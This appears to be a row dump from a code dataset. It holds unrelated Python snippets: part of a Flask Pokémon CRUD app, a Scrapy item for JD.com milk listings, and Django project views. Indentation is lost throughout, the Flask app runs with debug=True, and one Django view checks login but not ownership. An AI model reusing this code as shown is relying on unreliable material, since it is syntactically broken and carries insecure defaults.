def delete_pokemon(InstanceID):
if request.method=='POST':
pokemon=ysun95_pokemonindex.query.get_or_404(InstanceID)
db.session.delete(pokemon)
db.session.commit()
return redirect('/')
else:
return redirect('/')
@app.route('/pokemons/<int:InstanceID>',methods=['GET','POST'])
def get_pokemon(InstanceID):
pokemons=ysun95_pokemonindex.query.get_or_404(InstanceID)
return render_template('pokemons.html',form=pokemons,pageTitle="Pokemons details", legend='Pokemon Details')
@app.route('/pokemons/<int:InstanceID>/update',methods=['GET','POST'])
def update_pokemon(InstanceID):
pokemons=ysun95_pokemonindex.query.get_or_404(InstanceID)
form=Pokemonindex()
if form.validate_on_submit():
pokemons.national_index=form.national_index.data
pokemons.pokemon_name=form.pokemon_name.data
pokemons.generation=form.generation.data
db.session.commit()
return redirect(url_for('get_pokemon',InstanceID=pokemons.InstanceID))
form.InstanceID.data=pokemons.InstanceID
form.pokemon_name.data=pokemons.pokemon_name
form.national_index.data=pokemons.national_index
form.generation.data=pokemons.generation
return render_template('update_pokemon.html',form=form,pageTitle='Update pokemon',legend='Updata a pokemon')
if __name__ == '__main__':
app.run(debug=True)
|
24,198 | 01fa34d80962acfdda42062efc301b5d2734df29 | # -*- coding: utf-8 -*-
# Define here the models for your scraped items
#
# See documentation in:
# https://doc.scrapy.org/en/latest/topics/items.html
import scrapy
class JingdongMilkItem(scrapy.Item):
# define the fields for your item here like:
ID = scrapy.Field()
name = scrapy.Field()
shop_name = scrapy.Field()
link = scrapy.Field()
price = scrapy.Field()
CommentsCount = scrapy.Field()
GoodCount = scrapy.Field()
GeneralCount =scrapy.Field()
PoorCount =scrapy.Field()
AfterCount =scrapy.Field()
pass
|
24,199 | 01531d4bbd961e96bfc2fecea2d3054481b49c7a | from django.http import HttpResponse, HttpResponseRedirect, HttpResponseForbidden
from frat.forms import NewProjectForm
from django.shortcuts import render
from frat.models import Project, Page
from django.contrib.auth.models import User
from django.contrib.auth.decorators import login_required
from frat.cloud_handlers import remove_project_data
from django.template.defaultfilters import slugify
@login_required
def view_project(request, user_name, project_slug):
user = request.user
owner = User.objects.get(username=user_name)
project = Project.objects.get(owner=owner, slug=project_slug)
pages = Page.objects.filter(project=project).order_by('-created_at')
return render(request, 'project.html', {'project': project, 'pages': pages})
@login_required
def new_project(request):
user = request.user
if request.POST:
form = NewProjectForm(request.POST)
if form.is_valid():
new_project = form.save(commit=False)
new_project.owner = user
new_project.slug = slugify(new_project.name)
new_project.save()
form.save_m2m()
return HttpResponseRedirect('/%s/%s' % (user, new_project.slug))
else:
form = NewProjectForm()
return render(request, 'new.html', {'form': form, 'type':'project'})
@login_required
def remove_project(request, user_name, project_slug):
user = request.user
owner = User.objects.get(username=user_name)
if(user == owner):
project = Project.objects.get(owner=owner, slug=project_slug)
remove_project_data(project)
project.delete()
else:
return HttpResponseForbidden('You must be the owner to remove this project')
return HttpResponseRedirect('/%s' % user_name)
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.